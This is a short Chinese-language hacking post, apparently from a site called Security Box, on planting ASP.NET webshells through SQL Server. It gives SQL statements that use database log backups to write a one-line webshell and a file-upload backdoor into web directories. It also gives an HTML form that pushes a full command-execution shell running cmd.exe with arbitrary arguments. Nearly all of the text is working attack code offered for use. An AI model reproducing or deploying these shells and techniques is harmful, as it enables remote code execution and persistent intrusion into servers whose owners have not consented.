from:Security Box

1.相当于ASP的一句话木马:

1 alter   database  pubs  set  RECOVERY  FULL --
 2 create   table  pubs.dbo.cmd(a  image )
 3 backup   log  pubs  to   disk   =   ' c:\TM '   with  init
 4 insert   into  pubs.dbo.cmd(a)  values  ( ' <%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%>  ' )
 5 backup   log  pubs  to   disk   =   ' d:\test11.aspx '

mu.aspx.htm 客户端:(提交后访问:http://IP/images.aspx)

 1<form action=http://192.168.2.100/asp/mu.aspx method=post> 
 2<b>在下面输入大马内容:</b><br>
 3<textarea name=l cols=120 rows=35 width=45> 
 4<%@ Page Language="VB" Debug="true" %>
 5<%@ import Namespace="system.IO" %>
 6<%@ import Namespace="System.Diagnostics" %>
 7<script runat="server"> 
 8    Sub RunCmd(Src As Object, E As EventArgs) 
 9        Dim myProcess As New Process() 
10        Dim myProcessStartInfo As New ProcessStartInfo(xpath.Text) 
11        myProcessStartInfo.UseShellExecute = False 
12        myProcessStartInfo.RedirectStandardOutput = true 
13        myProcess.StartInfo = myProcessStartInfo 
14        myProcessStartInfo.Arguments=xCmd.text
15        myProcess.Start()
16        Dim myStreamReader As StreamReader = myProcess.StandardOutput 
17        Dim myString As String = myStreamReader.Readtoend()
18        myProcess.Close()
19        mystring=replace(mystring,"<","<")
20        mystring=replace(mystring,">",">")
21        result.text= vbcrlf & "<pre>" & mystring & "</pre>"
22    End Sub 
23</script>
24<html><head>
25<title>ASP.NET Shell for WebAdmin2.X Final</title>
26<meta http-equiv="Content-Type" c /></head><body>
27<form runat="server">
28<asp:Label id="L_p" style="COLOR: #0000ff" runat="server" width="80px">;Program</asp:Label>
29<asp:TextBox id="xpath" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox><br />
30<asp:Label id="L_a" style="COLOR: #0000ff" runat="server" width="80px">Arguments</asp:Label>
31<asp:TextBox id="xcmd" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox><br />
32<asp:Button id="Button" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #719bc5" runat="server" Width="100px" Text="Run"></asp:Button><p>
33<asp:Label id="result" style="COLOR: #0000ff" runat="server"></asp:Label> </p></form></body></html>
34</textarea><BR><center><br> 
35<input type=submit value=提交>


2、下面这个是我找网上的asp.net的上传文件程序,修改精简了下,也可以用:

1drop table pubs.dbo.cmd
2alter database pubs set RECOVERY FULL
3create table pubs.dbo.cmd(a image)
4backup log pubs to disk = 'c:\TM' with init
5insert into pubs.dbo.cmd(a) values ('<script language="c#" runat="server">private void bc(object o,EventArgs e) {string u="files";string filename;int pos=f.PostedFile.FileName.LastIndexOf("\\");filename=f.PostedFile.FileName.Substring(pos + 1);f.PostedFile.SaveAs(Server.MapPath(u)+"\\"+filename);}</script><form method="post" runat="server"><input type="file" id="f" runat="server"/><input type="submit" value="ss" runat="Server" /></form>')
6backup log pubs to disk = 'c:\inetpub\wwwroot\test11.aspx'